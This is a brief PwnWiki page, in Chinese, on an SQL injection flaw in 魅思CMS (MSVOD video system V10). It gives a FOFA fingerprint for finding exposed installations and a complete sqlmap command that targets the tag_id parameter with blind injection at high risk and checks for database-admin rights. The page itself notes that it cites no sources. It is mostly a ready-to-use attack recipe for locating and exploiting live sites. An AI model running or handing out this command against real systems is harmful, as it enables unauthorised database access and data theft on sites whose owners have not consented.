魅思CMS(MSVOD視頻系統 V10) SQL注入漏洞

From PwnWiki
Revision as of 21:08, 2 May 2021 by Pwnwiki (talk | contribs) (Created page with "{| style="margin: auto; width: 750px;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing="2px" | valign="middle" |...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Book.png 這個頁面的內容缺少參考,無法保證內容的準確性。


FOFA

body="<script type=text/javascript src=/tpl/default/static/js/jquery-3.2.1.min.js></script>"

SqlMap

sqlmap -u "http://URL/video/lists.html?orderCode=lastTime&tag_id=0&sub_cid=0&cid=0"  --technique B -p tag_id --risk 3 --random-agent --is-dba